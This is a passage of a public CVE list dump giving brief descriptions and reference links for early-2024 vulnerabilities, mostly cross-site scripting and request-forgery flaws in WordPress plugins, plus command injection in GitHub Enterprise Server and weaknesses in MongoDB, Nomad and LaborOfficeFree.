CVE    2024    1368    Candidate    The Page Duplicator plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the duplicate_dat_page() function in all versions up to, and including, 0.1.1. This makes it possible for unauthenticated attackers to duplicate arbitrary posts and pages.    MISC:https://plugins.trac.wordpress.org/browser/wp-page-duplicator/trunk/page-duplicator.php#L136   |   URL:https://plugins.trac.wordpress.org/browser/wp-page-duplicator/trunk/page-duplicator.php#L136   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/bcc10e91-4810-4a0d-919c-de3e87137f76?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/bcc10e91-4810-4a0d-919c-de3e87137f76?source=cve    Assigned (20240208)
CVE    2024    1367    Candidate    A command injection vulnerability exists where an authenticated, remote attacker with administrator privileges on the Security Center application could modify Logging parameters, which could lead to the execution of arbitrary code on the Security Center host.    MISC:https://www.tenable.com/security/tns-2024-02   |   URL:https://www.tenable.com/security/tns-2024-02    Assigned (20240208)
CVE    2024    1366    Candidate    The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘archive_title_tag’ attribute of the Archive Title widget in all versions up to, and including, 3.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3044937/happy-elementor-addons   |   URL:https://plugins.trac.wordpress.org/changeset/3044937/happy-elementor-addons   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/08208cb1-2d57-49f9-8ac7-b59caa0cf5fa?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/08208cb1-2d57-49f9-8ac7-b59caa0cf5fa?source=cve    Assigned (20240208)
CVE    2024    1365    Candidate    The YML for Yandex Market plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the feed_id parameter in all versions up to, and including, 4.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3039876%40yml-for-yandex-market%2Ftrunk&old=3036732%40yml-for-yandex-market%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3039876%40yml-for-yandex-market%2Ftrunk&old=3036732%40yml-for-yandex-market%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c343cee6-909d-4c1a-a6e4-f916a2ae223e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c343cee6-909d-4c1a-a6e4-f916a2ae223e?source=cve    Assigned (20240208)
CVE    2024    1363    Candidate    The Easy Accordion – Best Accordion FAQ Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'accordion_content_source' attribute in all versions up to, and including, 2.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3044803%40easy-accordion-free&new=3044803%40easy-accordion-free&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3044803%40easy-accordion-free&new=3044803%40easy-accordion-free&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/88f2fa28-5bb2-4633-b2bc-27cc6a4e304c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/88f2fa28-5bb2-4633-b2bc-27cc6a4e304c?source=cve    Assigned (20240208)
CVE    2024    1362    Candidate    The Colibri Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.253. This is due to missing or incorrect nonce validation on the cp_shortcode_refresh() function. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3039597/colibri-page-builder/trunk/src/PageBuilder.php   |   URL:https://plugins.trac.wordpress.org/changeset/3039597/colibri-page-builder/trunk/src/PageBuilder.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a5e7a994-c489-4aea-a9bb-898bc92cae4e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a5e7a994-c489-4aea-a9bb-898bc92cae4e?source=cve    Assigned (20240208)
CVE    2024    1361    Candidate    The Colibri Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.253. This is due to missing or incorrect nonce validation on the apiCall() function. This makes it possible for unauthenticated attackers to call a limited set of functions that can be used to import images, delete posts, or save theme data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3039597/colibri-page-builder/trunk/extend-builder/api/api.php   |   URL:https://plugins.trac.wordpress.org/changeset/3039597/colibri-page-builder/trunk/extend-builder/api/api.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/233a29f5-12bf-4849-9b28-4458a0b0c940?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/233a29f5-12bf-4849-9b28-4458a0b0c940?source=cve    Assigned (20240208)
CVE    2024    1360    Candidate    The Colibri WP theme for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.94. This is due to missing or incorrect nonce validation on the colibriwp_install_plugin() function. This makes it possible for unauthenticated attackers to install recommended plugins via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://themes.trac.wordpress.org/changeset/218308/colibri-wp/1.0.101/inc/src/PluginsManager.php   |   URL:https://themes.trac.wordpress.org/changeset/218308/colibri-wp/1.0.101/inc/src/PluginsManager.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/db56844f-9988-4f6a-ba1d-f190ff009f2b?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/db56844f-9988-4f6a-ba1d-f190ff009f2b?source=cve    Assigned (20240208)
CVE    2024    1359    Candidate    A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance when setting up an HTTP proxy. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com .    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10    Assigned (20240208)
CVE    2024    1358    Candidate    The Elementor Addon Elements plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.12.12 via the render function. This makes it possible for authenticated attackers, with contributor access or higher, to include the contents of arbitrary PHP files on the server, which may expose sensitive information.    MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/shape-separator/widgets/shape-separator.php#L89   |   URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/shape-separator/widgets/shape-separator.php#L89   |   MISC:https://plugins.trac.wordpress.org/changeset/3037925/addon-elements-for-elementor-page-builder/trunk/modules/shape-separator/widgets/shape-separator.php   |   URL:https://plugins.trac.wordpress.org/changeset/3037925/addon-elements-for-elementor-page-builder/trunk/modules/shape-separator/widgets/shape-separator.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/20cd3fff-0488-4bc2-961b-2427925e6a96?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/20cd3fff-0488-4bc2-961b-2427925e6a96?source=cve    Assigned (20240208)
CVE    2024    1355    Candidate    A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance via the actions-console docker container while setting a service URL. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program.    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10    Assigned (20240208)
CVE    2024    1354    Candidate    A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance via the `syslog-ng` configuration file. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program.    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10    Assigned (20240208)
CVE    2024    1353    Candidate    A vulnerability, which was classified as critical, has been found in PHPEMS up to 1.0. Affected by this issue is the function index of the file app/weixin/controller/index.api.php. The manipulation of the argument picurl leads to deserialization. The exploit has been disclosed to the public and may be used. VDB-253226 is the identifier assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/nxGzfEB6fFVY   |   URL:https://note.zhaoj.in/share/nxGzfEB6fFVY   |   MISC:https://vuldb.com/?ctiid.253226   |   URL:https://vuldb.com/?ctiid.253226   |   MISC:https://vuldb.com/?id.253226   |   URL:https://vuldb.com/?id.253226    Assigned (20240208)
CVE    2024    1351    Candidate    Under certain configurations of --tlsCAFile and tls.CAFile, MongoDB Server may skip peer certificate validation, which may allow untrusted connections to succeed. This may effectively reduce the security guarantees provided by TLS and open connections that should have been closed due to failing certificate validation. This issue affects MongoDB Server v7.0 versions prior to and including 7.0.5, MongoDB Server v6.0 versions prior to and including 6.0.13, MongoDB Server v5.0 versions prior to and including 5.0.24 and MongoDB Server v4.4 versions prior to and including 4.4.28. Required Configuration: A server process will allow incoming connections to skip peer certificate validation if the server process was started with TLS enabled (net.tls.mode set to allowTLS, preferTLS, or requireTLS) and without a net.tls.CAFile configured.    MISC:https://jira.mongodb.org/browse/SERVER-72839   |   URL:https://jira.mongodb.org/browse/SERVER-72839   |   MISC:https://www.mongodb.com/docs/manual/release-notes/4.4/#4.4.29---february-28--2024   |   URL:https://www.mongodb.com/docs/manual/release-notes/4.4/#4.4.29---february-28--2024   |   MISC:https://www.mongodb.com/docs/manual/release-notes/7.0/#7.0.6---feb-28--2024   |   URL:https://www.mongodb.com/docs/manual/release-notes/7.0/#7.0.6---feb-28--2024   |   MISC:https://www.mongodb.com/docs/v5.0/release-notes/5.0/#5.0.25---february-28--2024   |   URL:https://www.mongodb.com/docs/v5.0/release-notes/5.0/#5.0.25---february-28--2024   |   MISC:https://www.mongodb.com/docs/v6.0/release-notes/6.0/#6.0.14---feb-28--2024   |   URL:https://www.mongodb.com/docs/v6.0/release-notes/6.0/#6.0.14---feb-28--2024    Assigned (20240208)
CVE    2024    1349    Candidate    The EmbedPress – Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/embedpress/tags/3.9.8/EmbedPress/Shortcode.php   |   URL:https://plugins.trac.wordpress.org/browser/embedpress/tags/3.9.8/EmbedPress/Shortcode.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/631d200f-7b0b-4105-b91e-030af459ba99?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/631d200f-7b0b-4105-b91e-030af459ba99?source=cve    Assigned (20240208)
CVE    2024    1346    Candidate    Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to calculate the root password of the MySQL database used by LaborOfficeFree using two constants.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree    Assigned (20240208)
CVE    2024    1345    Candidate    Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to perform a brute force attack and easily discover the root password.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree    Assigned (20240208)
CVE    2024    1344    Candidate    Encrypted database credentials in LaborOfficeFree affecting version 19.10. This vulnerability allows an attacker to read and extract the username and password from the database of 'LOF_service.exe' and 'LaborOfficeFree.exe' located in the '%programfiles(x86)%\LaborOfficeFree\' directory. This user can log in remotely and has root-like privileges.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree    Assigned (20240208)
CVE    2024    1343    Candidate    A weak permission was found in the backup directory in LaborOfficeFree affecting version 19.10. This vulnerability allows any authenticated user to read backup files in the directory '%programfiles(x86)%\LaborOfficeFree\BackUp'.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree    Assigned (20240208)
CVE    2024    1342    Candidate    A flaw was found in OpenShift. The existing Cross-Site Request Forgery (CSRF) protections in place do not properly protect GET requests, allowing for the creation of WebSockets via CSRF.    MISC:RHBZ#2259960   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2259960   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1342   |   URL:https://access.redhat.com/security/cve/CVE-2024-1342    Assigned (20240207)
CVE    2024    1341    Candidate    The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's advanced_iframe shortcode in all versions up to, and including, 2024.1 due to the plugin allowing users to include JS files from external sources through the additional_js attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042304%40advanced-iframe&new=3042304%40advanced-iframe&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042304%40advanced-iframe&new=3042304%40advanced-iframe&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/699e5c80-8a11-4f67-8b17-41170d9c6411?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/699e5c80-8a11-4f67-8b17-41170d9c6411?source=cve    Assigned (20240207)
CVE    2024    1340    Candidate    The Login Lockdown – Protect Login Form plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the generate_export_file function in all versions up to, and including, 2.08. This makes it possible for authenticated attackers, with subscriber access and higher, to export this plugin's settings that include whitelisted IP addresses as well as a global unlock key. With the global unlock key an attacker can add their IP address to the whitelist.    MISC:https://plugins.trac.wordpress.org/browser/login-lockdown/trunk/libs/functions.php#L492   |   URL:https://plugins.trac.wordpress.org/browser/login-lockdown/trunk/libs/functions.php#L492   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3033542%40login-lockdown%2Ftrunk&old=3027788%40login-lockdown%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3033542%40login-lockdown%2Ftrunk&old=3027788%40login-lockdown%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/34021007-b5d3-479b-a0d4-50e301f22c9c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/34021007-b5d3-479b-a0d4-50e301f22c9c?source=cve    Assigned (20240207)
CVE    2024    1339    Candidate    The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the reinitialize function. This makes it possible for unauthenticated attackers to remove all plugin data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2d08e462-8297-477e-89da-47f26bd6beae?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2d08e462-8297-477e-89da-47f26bd6beae?source=cve    Assigned (20240207)
CVE    2024    1338    Candidate    The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the stopOptimizeAll function. This makes it possible for unauthenticated attackers to modify image optimization settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3dd131-dbd8-431c-96f4-4ab2c3be4dbd?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3dd131-dbd8-431c-96f4-4ab2c3be4dbd?source=cve    Assigned (20240207)
CVE    2024    1337    Candidate    The SKT Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'saveSktbuilderPageData' function in all versions up to, and including, 4.1. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary content into pages.    MISC:https://plugins.trac.wordpress.org/changeset/3034383/   |   URL:https://plugins.trac.wordpress.org/changeset/3034383/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3164b96f-d876-4cbc-bddf-51e9d9becee6?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3164b96f-d876-4cbc-bddf-51e9d9becee6?source=cve    Assigned (20240207)
CVE    2024    1336    Candidate    The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the optimizeAllOn function. This makes it possible for unauthenticated attackers to modify image optimization settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ca4cf299-9dee-4ebf-83f3-4c3471bd9fb0?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ca4cf299-9dee-4ebf-83f3-4c3471bd9fb0?source=cve    Assigned (20240207)
CVE    2024    1335    Candidate    The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the disableOptimization function. This makes it possible for unauthenticated attackers to disable the image optimization setting via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b3900e4f-4ae4-4026-89df-b63bd869a763?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b3900e4f-4ae4-4026-89df-b63bd869a763?source=cve    Assigned (20240207)
CVE    2024    1334    Candidate    The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the enableOptimization function. This makes it possible for unauthenticated attackers to enable image optimization via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0318ec4a-185a-405d-90f8-008ba373114b?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0318ec4a-185a-405d-90f8-008ba373114b?source=cve    Assigned (20240207)
CVE    2024    1333    Candidate    The Responsive Pricing Table WordPress plugin before 5.1.11 does not validate and escape some of its Pricing Table options before outputting them back in a page/post where the related shortcode is embedded, which could allow users with the author role and above to perform Stored Cross-Site Scripting attacks.    MISC:https://wpscan.com/vulnerability/30546402-03b8-4e18-ad7e-04a6b556ffd7/   |   URL:https://wpscan.com/vulnerability/30546402-03b8-4e18-ad7e-04a6b556ffd7/    Assigned (20240207)
CVE    2024    1331    Candidate    The Team Members WordPress plugin before 5.3.2 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the author role and above to perform Stored Cross-Site Scripting attacks.    MISC:https://wpscan.com/vulnerability/b2bac900-3d8f-406c-b03d-c8db156acc59/   |   URL:https://wpscan.com/vulnerability/b2bac900-3d8f-406c-b03d-c8db156acc59/    Assigned (20240207)
CVE    2024    1329    Candidate    HashiCorp Nomad and Nomad Enterprise 1.5.13 up to 1.6.6, and 1.7.3 template renderer is vulnerable to arbitrary file write on the host as the Nomad client user through symlink attacks. Fixed in Nomad 1.7.4, 1.6.7, 1.5.14.    MISC:https://discuss.hashicorp.com/t/hcsec-2024-03-nomad-vulnerable-to-arbitrary-write-through-symlink-attack   |   URL:https://discuss.hashicorp.com/t/hcsec-2024-03-nomad-vulnerable-to-arbitrary-write-through-symlink-attack    Assigned (20240207)
CVE    2024    1328    Candidate    The Newsletter2Go plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘style’ parameter in all versions up to, and including, 4.0.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/newsletter2go/tags/4.0.13/gui/N2Go_Gui.php#L296   |   URL:https://plugins.trac.wordpress.org/browser/newsletter2go/tags/4.0.13/gui/N2Go_Gui.php#L296   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/766ac399-7280-4186-8972-94da813da85e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/766ac399-7280-4186-8972-94da813da85e?source=cve    Assigned (20240207)
CVE    2024    1326    Candidate    The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via HTML Tag attributes in all versions up to, and including, 2.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/jeg-elementor-kit/trunk/class/elements/views/class-post-block-view.php#L375   |   URL:https://plugins.trac.wordpress.org/browser/jeg-elementor-kit/trunk/class/elements/views/class-post-block-view.php#L375   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038362%40jeg-elementor-kit&new=3038362%40jeg-elementor-kit&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038362%40jeg-elementor-kit&new=3038362%40jeg-elementor-kit&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d108cb36-c072-483e-9746-15b8e7a880c3?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d108cb36-c072-483e-9746-15b8e7a880c3?source=cve    Assigned (20240207)
CVE    2024    1325    Candidate    The Live Sales Notification for Woocommerce – Woomotiv plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.4.3. This is due to missing or incorrect nonce validation on the 'ajax_cancel_review' function. This makes it possible for unauthenticated attackers to reset the site's review count via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/woomotiv/tags/3.4.1/lib/class-backend.php#L495   |   URL:https://plugins.trac.wordpress.org/browser/woomotiv/tags/3.4.1/lib/class-backend.php#L495   |   MISC:https://wordpress.org/plugins/woomotiv/   |   URL:https://wordpress.org/plugins/woomotiv/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ca1c1b43-def2-4f9f-b5c7-075ca188f6e7?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ca1c1b43-def2-4f9f-b5c7-075ca188f6e7?source=cve    Assigned (20240207)
CVE    2024    1323    Candidate    The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Post Type Grid Widget Title in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3040304/themeisle-companion/tags/2.10.32/vendor/codeinwp/elementor-extra-widgets/class-elementor-extra-widgets.php   |   URL:https://plugins.trac.wordpress.org/changeset/3040304/themeisle-companion/tags/2.10.32/vendor/codeinwp/elementor-extra-widgets/class-elementor-extra-widgets.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038451%40themeisle-companion&new=3038451%40themeisle-companion&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038451%40themeisle-companion&new=3038451%40themeisle-companion&sfp_email=&sfph_mail=   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040304%40themeisle-companion&new=3040304%40themeisle-companion&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040304%40themeisle-companion&new=3040304%40themeisle-companion&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0241a9fc-ce42-4a97-9f33-f07cf53c0f52?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0241a9fc-ce42-4a97-9f33-f07cf53c0f52?source=cve    Assigned (20240207)
CVE    2024    1322    Candidate    The Directorist – WordPress Business Directory Plugin with Classified Ads Listings plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'setup_wizard' function in all versions up to, and including, 7.8.4. This makes it possible for unauthenticated attackers to recreate default pages and enable or disable monetization and change map provider.    MISC:https://plugins.trac.wordpress.org/browser/directorist/tags/7.8.4/includes/classes/class-setup-wizard.php#L300   |   URL:https://plugins.trac.wordpress.org/browser/directorist/tags/7.8.4/includes/classes/class-setup-wizard.php#L300   |   MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fdirectorist%2Ftags%2F7.8.4&old=3034765&new_path=%2Fdirectorist%2Ftags%2F7.8.5&new=3034765&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fdirectorist%2Ftags%2F7.8.4&old=3034765&new_path=%2Fdirectorist%2Ftags%2F7.8.5&new=3034765&sfp_email=&sfph_mail=   |   